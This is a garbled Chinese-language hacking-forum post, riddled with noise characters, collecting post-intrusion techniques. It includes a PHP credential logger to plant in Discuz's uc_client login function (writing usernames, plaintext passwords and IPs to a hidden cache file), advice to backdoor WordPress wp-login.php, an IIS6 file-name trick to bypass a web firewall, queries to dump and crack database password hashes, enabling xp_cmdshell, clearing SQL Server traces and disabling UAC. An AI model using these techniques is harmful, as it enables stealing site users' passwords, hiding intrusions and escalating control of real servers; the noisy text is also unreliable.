+ }1 [" C2 q) b" s8 C}
$ g  d! E* X2 V当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
( z% v- x/ p1 \% X就是搜索case ‘login’
" v) k$ |  N# k3 ]: Z) U% t在它下面直接插入即可,记录的密码生成在pwd.txt中,
# G8 Y5 g' _6 T4 d2 H; }. J: G+ z& O其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
) g5 x5 g! J7 y2 x; N. F# r利用II6文件解析漏洞绕过安全狗代码:
. y4 T3 d* `! F: f2 Q6 ~) F+ H;antian365.asp;antian365.jpg
. w2 V# b: L- U# H0 T% a; R) Q
4 |+ y. f. T4 _$ O各种类型数据库抓HASH破解最高权限密码!
7 B- J. L+ A0 f. k1.sql server2000$ M! d. a/ M& A: }5 r  V- h) H
SELECT password from master.dbo.sysxlogins where name='sa'3 G# V8 H( D6 p! T+ G
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503413 z- @! w' U2 H
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
+ N+ Z6 G  [( x& \# o; w$ f
6 L9 z& K- ^( a  s0 C: P$ o; p0×0100- constant header8 t( O" W9 l' G: g% y# c! x  o% T
34767D5C- salt5 g" Z8 q& |- n% `3 ~" n
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash. U# o3 y7 o2 X) H+ ^" `8 p
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
4 w+ A8 g2 G/ T8 k4 T4 E0 R4 Vcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
2 a" c3 @) r( c2 c+ xSQL server 2005:-
) r$ ~+ n9 l# `" o3 R' _! kSELECT password_hash FROM sys.sql_logins where name='sa'
7 G( R- s' t% }6 F' O0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F* b5 \& k6 C! X5 a2 I
0×0100- constant header. T) i3 I! {; {+ j  C; S
993BF231-salt% F8 R9 X6 [+ W1 m; T
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash4 z! ~+ T+ h- v8 ]
crack case sensitive hash in cain, try brute force and dictionary based attacks." f( X* m/ |+ V2 ~$ t, j& q7 z4 |# C

: v# y" G: }( W5 f, ^' pupdate:- following bernardo’s comments:-$ i! ], m" ^& Q7 M' O/ ?, W" u
use function fn_varbintohexstr() to cast password in a hex string.
5 q7 `) `+ z; k5 u& X, T4 Je.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
4 a- B* G" k* R" v7 v$ I3 L4 P6 W. e! K2 t' U! W
MYSQL:-
$ I2 D: M, e2 x& e
( p% R+ L. ^$ W1 I$ mIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
- o( R$ E  B# y9 _: s7 T- T( j# \/ n5 n# b: _
*mysql  < 4.1" G5 R8 Q: b2 @8 h& E* Y, X
8 Q& m0 j- B/ p/ k: X2 }/ x4 Q
mysql> SELECT PASSWORD(‘mypass’);7 R) {. O/ W* x# {4 d% O
+——————–+2 N+ V! V. t5 U2 i
| PASSWORD(‘mypass’) |  g- s5 q" i1 ^6 h
+——————–+
$ L" s, J" d- E0 f( o' w; E6 Q7 Y| 6f8c114b58f2ce9e   |+ i' E6 K/ e, K2 g! m6 p4 x
+——————–+# v  Q: s) U4 y

; I5 V7 r0 y9 x! H7 Q# B*mysql >=4.1
/ ^! Y0 b/ B$ o1 |; l# i8 v5 u- C. S) O# |" M) t4 h/ z
mysql> SELECT PASSWORD(‘mypass’);
% y. k9 i6 i9 b' R+ ]) g+——————————————-+
! |% W3 V* J1 C" \- v$ ?| PASSWORD(‘mypass’)                        |
( \3 v+ ], }+ p, P3 i9 }+ m+——————————————-+
8 h  t( f* p0 }| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
* ^' _& X# |, j3 {. e+——————————————-+
3 A7 j4 v6 i( K# c0 [3 |  q8 ]# Y4 N, K
Select user, password from mysql.user8 i: `+ {. h3 r" z  o
The hashes can be cracked in ‘cain and abel’% E% C, H/ [$ @3 ~9 G7 b
4 g& b, V0 F5 j8 f( t
Postgres:-
* _7 N$ d% i' ^+ ]4 _  q0 XPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)1 J: o: o& C9 _' X
select usename, passwd from pg_shadow;
5 k9 F8 Z& p& R6 P" xusename      |  passwd, d" v. I5 S6 I1 p( u0 A' }; H1 b0 M
——————+————————————-  g" f8 x1 j/ c9 F
testuser            | md5fabb6d7172aadfda4753bf0507ed4396
! r; R9 ?) y- o. m- Suse mdcrack to crack these hashes:-
# j/ y3 ]) E1 X  P- E) Y4 Y: S6 ^: v$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43962 [, m  g" C; w% N* Y9 H2 f3 N
1 _' I( x7 c, d+ O3 u: Q7 g0 e
Oracle:-
5 n) n% x4 X) N1 a! P( \4 V, F. eselect name, password, spare4 from sys.user$
% \8 s, o2 H+ C- ^" L% Fhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
% z! M- D" ?, H, `0 [! ^* JMore on Oracle later, i am a bit bored….9 o2 a1 z% W' k
1 Q2 ]: d1 x( U' I8 k

3 s9 y) f" \4 W5 W在sql server2005/2008中开启xp_cmdshell
$ c" I1 e0 s$ B# ^3 O* w: Y: S( ~-- To allow advanced options to be changed.' W) \8 w, @' H% q& ^# W, h
EXEC sp_configure 'show advanced options', 1
$ T% }# U8 D' O- A) v4 ^+ gGO
5 }1 g9 L; J' M5 ^8 U7 f-- To update the currently configured value for advanced options.4 c6 q9 u/ T7 `
RECONFIGURE
. F; T) E" v  G1 \' vGO" Q; `" z% @0 J4 D1 g7 Z: J5 F% H7 `
-- To enable the feature.
( u8 h3 Y9 m; HEXEC sp_configure 'xp_cmdshell', 1
, r: i' g4 {* r( r9 h7 TGO+ `3 H5 a2 u0 T1 |: I
-- To update the currently configured value for this feature.0 M6 P  e% k4 c0 ]" \
RECONFIGURE* e( h9 v# ~: ?4 e. S  T7 e
GO5 J6 R* X# |+ O8 d: I
SQL 2008 server日志清除,在清楚前一定要备份。
  _. M$ J9 A6 I- U如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
, X" F; K4 C- p/ f: UX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin7 j/ e. ], Q& C# ~* c$ z6 Z
1 [2 U$ z# L+ R& s/ G0 k
对于SQL Server 2008以前的版本:
: W, A. s# t$ w* mSQL Server 2005:8 z& g# Y7 l, A  U) n
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat, _+ A) S3 g5 [0 G
SQL Server 2000:; o7 B3 N' H. |9 Z+ e/ s5 |
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
. C0 L/ t1 v% T  i9 y2 i2 f6 W  m4 D' X% o$ N, u1 R( ?3 Y# K
本帖最后由 simeon 于 2013-1-3 09:51 编辑
, y* |6 |: w. K- W. V/ ?0 Y* x3 T  Z) I( ?
6 v2 X0 G, b( {/ a& B! ?" D
windows 2008 文件权限修改* N+ d* N  P+ }; P' c+ c* |( a
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
) b: r# `( C! }2 Z( V( k2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98/ P) S/ M, z' d
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
8 T+ t5 D3 `/ K- v* `" z$ G- c
0 s! B% u$ Z  q% ]+ k7 u0 {4 {0 NWindows Registry Editor Version 5.00( W& Q* p; Z3 _/ Z, a
[HKEY_CLASSES_ROOT\*\shell\runas]
, k, P, ~. K6 f$ K) h5 z5 N% ^@="管理员取得所有权"( b# d- f( {" ~
"NoWorkingDirectory"=""% ?$ ^# K8 u4 e* N- \& s& t! J
[HKEY_CLASSES_ROOT\*\shell\runas\command]/ P  ]* ^" W" ?. E( R1 m& K
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"- U1 F! Q5 B" @: e  m3 k
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"9 V. ^8 `# L& K/ p
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
2 ~$ K! q; H8 t' n' e/ }' P8 R@="管理员取得所有权"% e9 c! v7 B) J# j. x
"NoWorkingDirectory"=""
, P' I( t3 H* o) t[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
, ?, T7 ]% m% u9 b, M@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
. B! C6 t3 i/ t8 e"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
% M. B4 M& ^6 I7 d
# @% G9 e% M  R+ P[HKEY_CLASSES_ROOT\Directory\shell\runas]! f2 _, t+ v0 t# a  V5 h
@="管理员取得所有权"
/ N) b2 `& W1 G8 `; {6 h"NoWorkingDirectory"=""
0 W# ~/ O, u9 U1 L1 \* }[HKEY_CLASSES_ROOT\Directory\shell\runas\command]2 h# f1 h! f! L# F6 Y4 ^
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t", |5 L& X5 @) y: C3 h8 E
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
$ Z5 |# g) Q; s0 |/ ]+ u
  E8 x' W4 @% H. \! D/ y. }# m
1 J8 P& l7 Q" E& m# Z8 x/ |win7右键“管理员取得所有权”.reg导入
5 Z. i5 m1 i: ?! n5 X9 E4 n二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,' }- z- o$ k2 X+ }2 N  m( T
1、C:\Windows这个路径的“notepad.exe”不需要替换
+ w0 f* H1 V: n# F; B8 _$ E2、C:\Windows\System32这个路径的“notepad.exe”不需要替换- V) G1 m9 v5 w3 _& T
3、四个“notepad.exe.mui”不要管* k0 M8 Q  \' n8 O- x/ Y
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
6 \+ X# y1 }7 r. L6 m+ y6 ?+ CC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
" i, g. I  A  Y; ]5 ]% |4 I, I替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,$ A' i& N- ?  l" E* N3 _
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。0 }! a9 j' b& S6 H
windows 2008中关闭安全策略:
5 `; R4 t  d7 @/ d4 lreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f' l$ o# \: z9 X+ p, ]
修改uc_client目录下的client.php 在
5 w2 Z0 F0 o" \  j! ]( Afunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {# ?  X! ?6 l5 U# m! E$ ]# e, G
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php% L* t: S1 m/ H, S5 c
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
4 ]1 l* R* I& A  Zif(getenv('HTTP_CLIENT_IP')) {) ]- p' O8 ?' n8 U' F
$onlineip = getenv('HTTP_CLIENT_IP');5 E- ^$ [1 S% s7 K
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
4 x" T/ _' Y8 A; F$onlineip = getenv('HTTP_X_FORWARDED_FOR');
3 ?8 K' d7 Z) l6 B} elseif(getenv('REMOTE_ADDR')) {
  v' g- {' g6 Q$onlineip = getenv('REMOTE_ADDR');
' ^% J( X% N; k/ |: r: @} else {
8 Q+ ]  {# E: U5 R' o9 f8 ~$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];# ^; f% c' q2 c/ F% j
}, f' a5 ~: F" q
     $showtime=date("Y-m-d H:i:s");" ~4 |+ p* n+ s0 y1 ]
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
; |1 G9 J+ K9 [5 m( d( y" J    $handle=fopen('./data/cache/csslog.php','a+');' `8 s; ^+ o, W9 S- j
    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表